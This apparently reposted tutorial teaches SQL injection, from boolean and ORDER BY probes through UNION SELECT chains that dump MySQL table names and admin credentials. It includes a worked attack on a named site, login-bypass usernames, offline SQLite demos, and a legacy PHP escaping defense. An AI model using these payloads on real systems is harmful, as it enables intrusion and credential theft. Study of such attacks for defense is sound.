SQL injection
1726 | 2016-12-23 07:20:00
Detecting and verifying the vulnerability by appending to the SQL statement
Test payloads:
'
and 1=1
and 1=2
order by
union (UNION SELECT queries)
http://www.xxx.com/xx.php?id=12'   (a lone quote: a database error on the page means the quote landed inside the SQL)
http://www.xxx.com/xx.php?id=12' and '1'='2   (string context, always false: the page should change or come back empty)
http://www.xxx.com/xx.php?id=12' and '1'='1   (string context, always true: the page should render normally; the quotes must stay balanced or the query is a syntax error)
First
http://www.xxx.com/xx.php?id=12 order by 8   the 8 has to be found by trial: raise it until the page errors; the largest value that still works is the number of columns the query selects (for SELECT * that is the number of columns in the table)
Then
http://www.xxx.com/xx.php?id=12 and 1=2 union select 1,2,3,4,5,6,7
"and 1=2" makes the original WHERE clause match nothing, so the row produced by the UNION is what gets rendered: the numbers that show up on the page tell you which columns it displays
http://www.xxx.com/xx.php?id=12 and 1=2 union select 1,2,3,4,5,6,user()
shows the account the application connects as, e.g. root@localhost
http://www.xxx.com/xx.php?id=12 and 1=2 union select 1,2,3,4,5,6,database()
shows the current database name
http://www.xxx.com/xx.php?id=12 and 1=2 union select 1,2,3,4,5,6,group_concat(table_name) from information_schema.tables where table_schema=<database name as a 0x hex literal>
lists the tables in that database (MySQL reads a 0x... hex literal as a string, but it contains no quote characters, so it gets past addslashes()/magic quotes)
http://www.xxx.com/xx.php?id=12 and 1=2 union select 1,2,3,4,5,6,group_concat(column_name) from information_schema.columns where table_name=<table name as a 0x hex literal>
lists the columns of that table (a bare table name is ambiguous if another database on the server has a table with the same name)
http://www.xxx.com/xx.php?id=12 and 1=2 union select 1,2,3,4,5,6,group_concat(username,password) from <table name>
reads the usernames and passwords out of that table (group_concat with no separator runs each username straight into its password)
or put them in two display columns: http://www.xxx.com/xx.php?id=12 and 1=2 union select 1,2,group_concat(username),4,5,6,group_concat(password) from <table name>
information_schema was introduced in MySQL 5.0; it is the server's catalog of databases, tables and columns, which is what the two metadata queries above read from.
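The whole procedure above (the and 1=1 / and 1=2 probe, counting columns with ORDER BY, and the UNION SELECT chain from table names to columns to credentials), as an added example that is not part of the original post. It uses SQLite as a stand-in for MySQL so it runs offline: the news and admin tables, their rows, and the 3-column SELECT are constructed here, sqlite_master and pragma_table_info() stand in for information_schema.tables and information_schema.columns, and the hexlit() helper only produces the MySQL-style 0x literal the post uses (SQLite does not compare hex literals as strings, so the stand-in filters by plain names).

```python
import sqlite3

# Added example: a SQLite stand-in for the vulnerable MySQL page. Table,
# column and row contents are constructed; SQLite's sqlite_master and
# pragma_table_info() play the role of MySQL's information_schema.
def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT);
        INSERT INTO news VALUES (12, 'Hello', 'first post');
        CREATE TABLE admin(id INTEGER, loginname TEXT, password TEXT);
        INSERT INTO admin VALUES (1, 'admin', '21232f297a57a5a743894a0e4a801fc3');
    """)
    return con


def vulnerable_lookup(con, id_param):
    """Models xx.php?id=...: the raw parameter is pasted into the SQL string."""
    sql = f"SELECT id, title, body FROM news WHERE id={id_param}"
    return con.execute(sql).fetchall()


def boolean_probe(con, base_id="12"):
    """The 'and 1=1' / 'and 1=2' test: the row counts differ only if the
    database really evaluates the appended condition."""
    true_rows = vulnerable_lookup(con, f"{base_id} and 1=1")
    false_rows = vulnerable_lookup(con, f"{base_id} and 1=2")
    return len(true_rows), len(false_rows)


def find_column_count(con, base_id="12", limit=30):
    """ORDER BY n: raise n until the database errors; the last n that
    worked is the number of columns the original SELECT returns."""
    for n in range(1, limit + 1):
        try:
            vulnerable_lookup(con, f"{base_id} order by {n}")
        except sqlite3.OperationalError:
            return n - 1
    return None


def hexlit(s):
    """MySQL 0x... literal for a string (0x61646d696e == 'admin'), so the
    payload carries no quote characters for addslashes() to mangle."""
    return "0x" + s.encode().hex()


def union_extract(con, expr, source=None, cols=3, slot=2, base_id="12"):
    """'and 1=2' empties the real result set; UNION SELECT puts `expr` in
    display column `slot`, which is what the page then renders."""
    parts = [str(i + 1) for i in range(cols)]
    parts[slot - 1] = expr
    payload = f"{base_id} and 1=2 union select {','.join(parts)}"
    if source:
        payload += f" from {source}"
    return [row[slot - 1] for row in vulnerable_lookup(con, payload)]


def dump_admin_table(con):
    """The post's full chain: table names -> columns of admin -> credentials.
    MySQL would read information_schema.tables / .columns and use
    group_concat(loginname,0x3a,password) for the separator instead."""
    tables = union_extract(con, "group_concat(name)",
                           "sqlite_master where type='table'")[0]
    columns = union_extract(con, "group_concat(name)",
                            "pragma_table_info('admin')")[0]
    creds = union_extract(con, "group_concat(loginname || ':' || password)",
                          "admin")[0]
    return tables, columns, creds


if __name__ == "__main__":
    db = build_db()
    print("and 1=1 / and 1=2 row counts:", boolean_probe(db))
    print("column count:", find_column_count(db))
    print("hex literal for 'admin':", hexlit("admin"))
    print("tables, columns, creds:", dump_admin_table(db))
```

find_column_count() stops at the first ORDER BY that the database rejects, which is the same signal the post reads off the page (an error or a blank page); on a real target the error may be suppressed, in which case the blank page is the only tell.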
Example:
First
http://www.one.com/business_view.php?id=1 and 1=2 union select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from information_schema.tables where table_schema=0x71646d32303934303531305f6462
(this query selects 29 columns and column 4 is the one the page displays; 0x71646d32303934303531305f6462 is the database name qdm20940510_db written as a hex literal)
This lists all the table names: admin,jiamengshang,news,news_category,pic,pic_category,region,renli,sys_config
The same request URL-encoded, as the browser actually sends it:
http://www.one.com/business_view.php?id=1%20and%201=2%20union%20select%201,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%20from%20information_schema.tables%20where%20table_schema=0x71646d32303934303531305f6462
Then
http://www.one.com/business_view.php?id=1 and 1=2 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from information_schema.columns where table_name=0x61646d696e
(0x61646d696e is the table name admin as a hex literal)
This lists every column of admin:
id,loginname,password,email,group_id,unmd5pwd
http://www.one.com/business_view.php?id=1 and 1=2 union select 1,2,3,group_concat(loginname,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from admin
This gives the back-end username and password:
admin
21232f297a57a5a743894a0e4a801fc3   this is an MD5 hash, not an encrypted value; it is not "decrypted" but looked up, and the lookup gives admin
Fingerprinting the server:
http://www.one.com/business_view.php?id=1 and 1=2 union select 1,2,3,@@version,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
shows the installed MySQL version
http://www.one.com/business_view.php?id=1 and 1=2 union select 1,2,3,@@version_compile_os,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
shows the operating system the server was built for
http://www.one.com/business_view.php?id=1 and 1=2 union select 1,2,3,@@basedir,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
shows the MySQL installation directory (@@basedir; the data directory is @@datadir)
// A few commonly used functions and system variables:
1. version(): MySQL version
2. user(): the account the application connects as
3. database(): current database name
4. @@datadir: MySQL data directory
5. @@version_compile_os: operating system the server was built for
Bypassing the login password:
Username: admin' or '1'='1
Username: admin'--    (in SQL, -- starts a comment, so everything after it, including the password check, is dropped from the statement)
Username: admin' or 1='1
SQL defenses:
1. A generic input-filtering script
2. mysql_real_escape_string() / addslashes()
stripslashes() removes the backslashes that addslashes() added (used before escaping again, so a value is not escaped twice).
The approach the original post gives for preventing database attacks (escape and quote every value before it is concatenated into the query). Note that ext/mysql was removed in PHP 7.0 and get_magic_quotes_gpc() in PHP 8.0, so this code only runs on PHP 5; on current PHP the equivalent is a mysqli or PDO prepared statement, which keeps the values out of the SQL text entirely:
<?php
// Legacy PHP 5 example: ext/mysql and magic quotes no longer exist in modern PHP
function check_input($value)
{
// Undo the backslashes magic_quotes_gpc added, so the value is not escaped twice
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}
// Non-numeric values are escaped for the open connection and wrapped in quotes;
// numeric values are inserted bare, which is safe only because is_numeric() was checked
if (!is_numeric($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
return $value;
}
$con = mysql_connect("localhost", "hello", "321");
if (!$con)
{
die('Could not connect: ' . mysql_error());
}
// mysql_real_escape_string() needs an open connection, so check_input() must run after mysql_connect()
$user = check_input($_POST['user']);
$pwd = check_input($_POST['pwd']);
$sql = "SELECT * FROM users WHERE
user=$user AND password=$pwd";
mysql_query($sql);
mysql_close($con);
?>
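The login bypass above and the defense it calls for, as an added example that is not part of the original post. It uses Python with SQLite as a stand-in for the PHP/MySQL login: the users table and its single row are constructed, login_concatenated() builds the query exactly the way the PHP snippet does but with no escaping, and login_parameterized() is the prepared-statement form that replaces escaping. The three bypass usernames are the ones from the post, each sent with a wrong password.

```python
import sqlite3

# Added example: SQLite stand-in for the post's PHP login check. The users
# table and its single row are constructed for the demonstration.
def build_users_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(user TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'secret-pass')")
    return con


def login_concatenated(con, user, pwd):
    """The query from the PHP snippet built by string concatenation, with
    the quotes written into the SQL text and no escaping at all."""
    sql = f"SELECT * FROM users WHERE user='{user}' AND password='{pwd}'"
    return con.execute(sql).fetchone() is not None


def login_parameterized(con, user, pwd):
    """Prepared statement: the values travel separately from the SQL text,
    so a quote or a -- inside them is plain data and cannot end the statement."""
    sql = "SELECT * FROM users WHERE user=? AND password=?"
    return con.execute(sql, (user, pwd)).fetchone() is not None


# The bypass usernames from the post, each paired with a wrong password.
BYPASS_ATTEMPTS = [
    ("admin' or '1'='1", "wrong"),  # OR '1'='1' is always true; AND binds tighter, so user='admin' alone wins
    ("admin'-- ", "wrong"),          # '-- ' comments out the AND password=... part
    ("admin' or 1='1", "wrong"),
]


def bypass_results(con, login):
    """Run every bypass attempt through the given login function and
    report which ones were let in."""
    return [login(con, u, p) for u, p in BYPASS_ATTEMPTS]


if __name__ == "__main__":
    db = build_users_db()
    print("concatenated SQL, bad password:", bypass_results(db, login_concatenated))
    print("parameterized SQL, bad password:", bypass_results(db, login_parameterized))
    print("parameterized SQL, real password:", login_parameterized(db, "admin", "secret-pass"))
```

The first attempt gets in because AND binds tighter than OR, so the concatenated WHERE reads user='admin' OR ('1'='1' AND password='wrong'), and user='admin' is true on its own; the parameterized version compares the whole string "admin' or '1'='1" against the user column and finds nothing.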